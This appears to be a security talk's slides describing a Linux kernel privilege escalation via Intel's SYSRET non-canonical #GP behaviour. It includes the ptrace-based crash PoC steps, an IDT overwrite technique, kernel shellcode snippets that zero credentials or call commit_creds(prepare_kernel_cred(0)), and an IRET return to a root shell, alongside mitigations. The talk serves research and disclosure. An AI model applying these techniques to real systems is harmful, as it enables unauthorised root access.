Exploiting the Linux Kernel via 
Intel's SYSRET Implementation 
Niko@FluxFingers
Outline 
● Syscalls and Context Switches 
● Canonical Addresses 
● SYSRET #GP Triggering 
● Step by Step Exploitation and Rooting
Linux x86_64 Syscalls 
● On old x86 processors: int $0x80 with the Nr. in %eax 
and Params in %ebx, %ecx, etc 
○ However it’s super slow and was replaced with Intel’s 
SYSENTER mechanism 
● x86_64 uses AMD’s SYSCALL with Params in 
%rdi, %rsi, %rdx, %rcx, ... 
○ Faster to handle than the whole interrupt path 
○ Intel CPUs adapted SYSCALL according to AMD’s specs since it 
became the standard syscall-mechanism
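The fast-path calling convention can be exercised directly from C — a minimal sketch assuming x86_64 Linux (where syscall number 1 is __NR_write). Note that SYSCALL itself clobbers %rcx and %r11, which is exactly the %rcx dependency the rest of this talk abuses:

```c
#include <stdint.h>

/* Invoke a 3-argument syscall via the SYSCALL instruction:
 * number in %rax, args in %rdi/%rsi/%rdx. The CPU saves the
 * return %rip in %rcx and %rflags in %r11, so both are clobbered. */
static long raw_syscall3(long nr, long a1, long a2, long a3)
{
    long ret;
    __asm__ __volatile__("syscall"
                         : "=a"(ret)
                         : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                         : "rcx", "r11", "memory");
    return ret;
}

/* e.g. raw_syscall3(1, 1, (long)"hi\n", 3) behaves like write(1, "hi\n", 3) */
```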
SYSCALL/SYSRET 
● Whenever a syscall is invoked via SYSCALL a 
context switch to kernel mode takes place 
○ When leaving the syscall the kernel needs to restore specific 
userland registers 
○ And transfer back to ring3 with SYSRET 
● SYSRET is fast since it “only” needs to: 
○ Load the saved %rip from %rcx 
○ Swap %cs back to ring3 mode 
● The kernel itself has to make sure to restore all other 
userland registers before executing SYSRET
SYSCALL/SYSRET 
[Diagram: x86_64 memory map, SYSCALL arrow from userland into kernel 
memory — Process (/bin/cat) .text/.data/.bss/heap from 
0x0000000000400000 up to 0x00000000006XXXXX, shared libraries around 
0x00007fXXXXXXXXXX, stack below 0x00007ffffXXXXXXX, VSYSCALL at 
0xffffffffff600000, kernel memory above 0xffffffff80000000] 
SYSCALL/SYSRET 
[Same diagram, SYSRET arrow back from kernel memory into the 
userland process] 
How Linux handles SYSRET 
● arch/x86/kernel/entry_64.S: 
ret_from_sys_call: 
movl $_TIF_ALLWORK_MASK,%edi 
... 
sysret_check: 
... 
movq RIP-ARGOFFSET(%rsp),%rcx 
CFI_REGISTER rip,rcx 
RESTORE_ARGS 1,-ARG_SKIP,0 
movq PER_CPU_VAR(old_rsp), %rsp 
USERGS_SYSRET64 
● The kernel makes sure to restore %rsp and %gs etc 
and calls SYSRET in the end
Canonical Addresses 
● On x86_64 registers are 64 bit wide 
● The instruction pointer (%rip) can only use 48 bits 
○ 48 Bits == balanced value for page-tables/accessible memory 
● The leftover high bits of an address are reserved for 
CPU specific uses 
○ compare the NX bit in position 63 of a page-table entry 
● Meaning the value of %rip has to be “canonical” aka 
between 
○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF 
○ 0xFFFF800000000000 -> 0xFFFFFFFFFFFFFFFF 
● (Bits 48 .. 63 have to be copies of bit 47) 
● Non-canonical values in %rip are not allowed and will 
trigger exceptions in certain cases
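The canonical rule is easy to check in plain C — bits 47..63 must be all zero or all one, matching the two ranges above (a small sketch):

```c
#include <stdint.h>

/* An address is canonical (on 48-bit implementations) when bits
 * 48..63 are copies of bit 47, i.e. the top 17 bits are all 0 or all 1. */
static int is_canonical(uint64_t addr)
{
    uint64_t top = addr >> 47;          /* bits 47..63 */
    return top == 0 || top == 0x1ffff;
}
```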
Non-canonical addresses and SYSRET 
● Whenever a SYSRET is executed and the CPU sees 
a non-canonical value in %rcx it triggers a #GP 
● AMD specs however never defined when the #GP 
will actually happen 
● Clever researchers at Xen found out AMD CPUs will 
trigger the #GP only when back in usermode 
● Not so on Intel ...
Intel’s Version of SYSRET 
● AMD’s specs never specified when the check for 
non-canonical values in %rcx / %rip happens 
● Intel decided to check for non-canonical values 
before the privilege level is changed
Intel’s Version of SYSRET 
● Triggering a #GP from kernel mode has 
consequences on Linux 
● Recall that prior to executing SYSRET Linux 
restores the userland %rsp and swaps %gs 
● Intel’s SYSRET will #GP on the userland stack while 
still being in ring0
#GP on userland %rsp 
● #GP is an exception reached via an IDT entry: 
arch/x86/kernel/traps.c: 
set_intr_gate(X86_TRAP_GP, general_protection); 
● Where general_protection is built by the errorentry macro in 
arch/x86/kernel/entry_64.S: 
.macro errorentry sym do_sym 
ENTRY(sym) 
XCPT_FRAME 
ASM_CLAC 
PARAVIRT_ADJUST_EXCEPTION_FRAME 
subq $ORIG_RAX-R15, %rsp 
CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 
call error_entry 
...
#GP on userland %rsp 
● error_entry sets up an exception stack frame and backs up all registers: 
ENTRY(error_entry) 
XCPT_FRAME 
CFI_ADJUST_CFA_OFFSET 15*8 
cld 
movq_cfi rdi, RDI+8 
movq_cfi rsi, RSI+8 
movq_cfi rdx, RDX+8 
… 
● where movq_cfi is defined as 
.macro movq_cfi reg offset=0 
movq %reg, offset(%rsp) 
CFI_REL_OFFSET reg, offset 
.endm
#GP on userland %rsp 
● When setting up the stack frame in error_entry all 
(general) registers are saved to x(%rsp) / [rsp+x] 
● The kernel restored the userland %rsp and 
registers before SYSRET 
● => Arbitrary memory write while in ring0 
● Classic possibility for privilege escalation
Linux’ Protection against n/c %rip 
● This behaviour already bit Linux in 2006 
(CVE-2006-0744) 
● To make sure no code ends up in non-canonical 
address space (or right before it) a guard page was 
introduced 
● mmap(0x7ffffffff000, 4096, PROT_READ, … ) will 
return ENOMEM 
● This way SYSRET “shouldn’t” return to any n/c 
address
Linux’ Protection against n/c %rip 
● Another possibility is using a “safe” IRET path for 
returning back to ring3 
○ IRET requires a ring3 frame (%ss, %rsp, %rflags, %cs, %rip) on the 
stack to return to user-code 
○ Is slower than SYSRET 
● The ptrace interface sets an IRET path most of the 
time 
● However some syscalls use a SYSRET path even 
while being ptraced 
● One example is fork() since it signals via 
ptrace_event(), which does not force IRET 
Crash PoC 
● fork() a child 
● Child sets PTRACE_TRACEME 
● Raise SIGSTOP 
● Parent sets PTRACE_O_TRACEFORK 
● Child fork()s again 
● Parent catches this fork 
● And uses PTRACE_SETREGS to set %rip to n/c 
● Pivots %rsp to arbitrary place 
● And resumes it with PTRACE_CONT 
● fork() will return with SYSRET with n/c %rcx 
● CPU will #GP, Pagefault, Doublefault and Panic
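The ptrace plumbing of the PoC (minus the crash itself) can be sketched harmlessly — this only reads the child's registers where the real PoC would PTRACE_SETREGS a non-canonical %rip; x86_64 Linux assumed:

```c
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <signal.h>
#include <unistd.h>

/* fork() a child that asks to be traced and stops itself; the
 * parent then inspects its registers. The real PoC would modify
 * regs.rip/regs.rsp at this point and PTRACE_CONT into the #GP. */
static unsigned long long traced_child_rip(void)
{
    pid_t pid = fork();
    if (pid == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);
        _exit(0);
    }
    int status;
    waitpid(pid, &status, 0);  /* child is now signal-stopped */

    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    unsigned long long rip = regs.rip;

    ptrace(PTRACE_DETACH, pid, NULL, NULL);  /* let the child run and exit */
    waitpid(pid, &status, 0);
    return rip;
}
```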
How to get root
The plan 
● We need to get Kernel Code Execution between 
the #GP and Panic 
● Then restore the damage we have done 
● Set credentials of current process to 0 
● Return back to userland 
● And open shell
The target 
● Since the #GP (escalating into a Pagefault and 
Doublefault) pushes exception frames to wherever %rsp 
points, we can pivot %rsp into the IDT 
● And set 2 specific registers to craft a fake IDT gate 
● That will then be written over the orig Pagefault or 
Doublefault handler 
IDT Layout 
● We can read the IDTR with the sidt instruction 
IDT Gate Entry 
● And setup a new gate with modified “Offsets”
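The gate layout makes this concrete — a userland sketch of how a 64-bit handler address is scattered across the three “Offset” fields (0x8e = present DPL0 interrupt gate; the selector value in the usage comment is a placeholder):

```c
#include <stdint.h>

/* x86_64 interrupt gate descriptor: 16 bytes, handler address
 * split across offset_low / offset_mid / offset_high. */
struct idt_gate {
    uint16_t offset_low;   /* handler bits  0..15 */
    uint16_t selector;     /* kernel code segment selector */
    uint8_t  ist;          /* interrupt stack table index */
    uint8_t  type_attr;    /* P/DPL/type, 0x8e = present interrupt gate */
    uint16_t offset_mid;   /* handler bits 16..31 */
    uint32_t offset_high;  /* handler bits 32..63 */
    uint32_t reserved;
} __attribute__((packed));

/* Build a gate pointing at an arbitrary handler, e.g. make_gate(addr, 0x10). */
static struct idt_gate make_gate(uint64_t handler, uint16_t cs)
{
    struct idt_gate g = {0};
    g.offset_low  = handler & 0xffff;
    g.selector    = cs;
    g.type_attr   = 0x8e;
    g.offset_mid  = (handler >> 16) & 0xffff;
    g.offset_high = handler >> 32;
    return g;
}

/* Reassemble the handler address from a gate. */
static uint64_t gate_offset(const struct idt_gate *g)
{
    return (uint64_t)g->offset_high << 32 |
           (uint64_t)g->offset_mid  << 16 | g->offset_low;
}
```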
The target 
● Before we trigger #GP we can allocate a Landing 
Area in Userland 
● Where we copy code that will be executed 
● Craft a fake IDT gate that points to this area 
● Triggering #GP will then overwrite e.g. Doublefault 
with the fake gate 
● And the kernel will jump to Userland and execute 
our code with kernel privs
Kernel Shellcode 
● Inside this code we will have to swapgs in order to 
access kernel structures 
● Then we carefully rebuild all IDT entries that were 
trashed in the overwrite process 
● Then we can raise process credentials
Process structures 
● Each process in userland has an associated kernel 
structure (thread_union) that builds the kernel 
stack: 
thread_union 
thread_info 
Kernel Stack
Process structures 
● thread_info itself has an element that points to 
task_struct 
thread_info 
*task_struct 
*exec_domain 
…
Process structures < 2.6.29 
● task_struct contains lots of info about the running 
task 
● and its credentials 
task_struct 
state 
stack 
usage 
... 
uid, gid, caps,... 
Process structures < 2.6.29 
task_struct 
state 
stack 
usage 
... 
uid, gid, caps,... 
thread_info 
*task_struct 
*exec_domain 
… 
thread_union 
thread_info 
Kernel Stack
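Because thread_union is THREAD_SIZE-aligned, any in-stack kernel pointer can be masked down to its thread_info — a sketch of the classic trick (a THREAD_SIZE of 8 KiB is assumed, as on older x86_64 configs):

```c
#include <stdint.h>

#define THREAD_SIZE 8192UL  /* assumed: 2 pages, older x86_64 kernels */

/* thread_info sits at the bottom of the aligned thread_union,
 * so masking off the low bits of a kernel %rsp yields its address. */
static uint64_t thread_info_from_rsp(uint64_t rsp)
{
    return rsp & ~(THREAD_SIZE - 1);
}
```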
Kernel Shellcode 
● On < 2.6.29 raising process credentials is a matter 
of finding uid, gid and caps in task_struct 
● And patching them to 0 
● Luckily %gs in kernel mode points to the 
x8664_pda (/include/asm-x86/pda.h) 
/* Per processor datastructure. %gs points to it while the kernel runs */ 
struct x8664_pda { 
struct task_struct *pcurrent; /* 0 Current process */ 
unsigned long data_offset; /* 8 Per cpu data offset from linker address */ 
unsigned long kernelstack; /* 16 top of kernel stack for current */ 
unsigned long oldrsp; /* 24 user rsp for system call */ 
int irqcount; /* 32 Irq nesting counter. Starts with -1 */ 
int cpunumber; /* 36 Logical CPU number */ 
#ifdef CONFIG_CC_STACKPROTECTOR 
unsigned long stack_canary; 
...
Kernel Shellcode 
● %gs:0 holds pcurrent, the pointer to the current task_struct 
● So we can simply: 
asm("movq %%gs:0, %0" : "=r"(ptr)); 
cred = (uint32_t *)ptr; 
for (i = 0; i < 1000; i++, cred++) { 
if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && 
cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { 
cred[0] = cred[1] = cred[2] = cred[3] = 0; 
cred[4] = cred[5] = cred[6] = cred[7] = 0; 
break; 
} 
} 
● Where uid/gid are getuid() and getgid() 
● And our process will be root
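The scan is easy to re-enact in userland against a fake buffer — a sketch using the slide's 4×uid/4×gid word pattern (the real pre-2.6.29 task_struct layout differs in detail):

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Scan a word array for four uid words followed by four gid words
 * and zero them out -- the same pattern match the shellcode runs
 * over the live task_struct. Returns 1 if the pattern was patched. */
static int patch_creds(uint32_t *buf, size_t words,
                       uint32_t uid, uint32_t gid)
{
    for (size_t i = 0; i + 8 <= words; i++) {
        uint32_t *c = buf + i;
        if (c[0] == uid && c[1] == uid && c[2] == uid && c[3] == uid &&
            c[4] == gid && c[5] == gid && c[6] == gid && c[7] == gid) {
            memset(c, 0, 8 * sizeof(uint32_t));  /* "become root" */
            return 1;
        }
    }
    return 0;
}
```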
Kernel Shellcode 
● On > 2.6.29 x8664_pda is removed 
● And task_struct contains a new member called 
cred (credential records) 
● If %rsp wasn’t modified we could walk back to the top 
of the stack to find thread_info 
● And do heuristic scanning to find 
thread_info->task_struct->cred->uid/gid 
● However with credential records come two new 
functions 
● prepare_kernel_cred / commit_creds
Kernel Shellcode 
● prepare_kernel_cred creates a new clean 
credentials structure 
● commit_creds installs the new cred to the current 
task 
● Both symbols are exported through /proc/kallsyms 
or /boot/System.map 
● Kernel shellcode just needs to 
commit_creds(prepare_kernel_cred(0)); 
● And we’re root again
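Resolving the two symbols is a one-line parse per /proc/kallsyms or System.map entry — a sketch; the address in the example is made up:

```c
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms/System.map style line, e.g.
 *   "ffffffff81085c10 T commit_creds"
 * and return the address when the symbol name matches, else 0. */
static unsigned long kallsyms_match(const char *line, const char *want)
{
    unsigned long addr;
    char type, name[128];
    if (sscanf(line, "%lx %c %127s", &addr, &type, name) == 3 &&
        strcmp(name, want) == 0)
        return addr;
    return 0;
}
```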
Kernel Shellcode 
● Next we will have to cleanly return back to 
userland 
● Easiest method is to use IRET: 
__asm__ __volatile__( 
"movq %0, 0x20(%%rsp);" 
"movq %1, 0x18(%%rsp);" 
"movq %2, 0x10(%%rsp);" 
"movq %3, 0x08(%%rsp);" 
"movq %4, 0x00(%%rsp);" 
"swapgs;" 
"iretq;" 
:: "i"(USER_SS), 
"i"(user_stack), 
"i"(USER_FL), 
"i"(USER_CS), 
"i"(user_code) 
); 
● Where user_code points to memory in userland 
that should be executed when kernel exits
Popping uid=0(root) 
● user_code can do anything now since it runs as 
root 
● So we can simply execve("/bin/sh", ...) from there 
● However that happens inside the child so we have 
to bring the rootshell back to the parent 
● Or we just chmod() or setxattr() to drop a root-shell
Demo Time
Limitations 
● These techniques work well with 2.6.18 - 3.9.X 
● 3.10 mitigates the IDT attack by remapping it 
read-only (arch/x86/kernel/traps.c): 
__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO); 
idt_descr.address = fix_to_virt(FIX_RO_IDT); 
● CPUs with SMEP will fault on executing userland code 
while still being in ring0 (SMAP likewise for data accesses) 
● Grsecurity provides a handful of protections that 
make this bug a pain to exploit 
○ GRKERNSEC_RANDSTRUCT 
○ PAX_MEMORY_UDEREF 
○ GRKERNSEC_HIDESYM 
○ ...
Further thoughts 
● The Linux fix is weird (it “only” forces ptrace_stop() 
to use IRET) 
● Syscalls can still return via SYSRET 
● Also the bug within SYSRET itself is still present 
● Since it’s a hardware issue it might be present in 
other OSes in different variations (OHAI 2006) 
● Any1 wanna check FreeBSD …?
Questions?
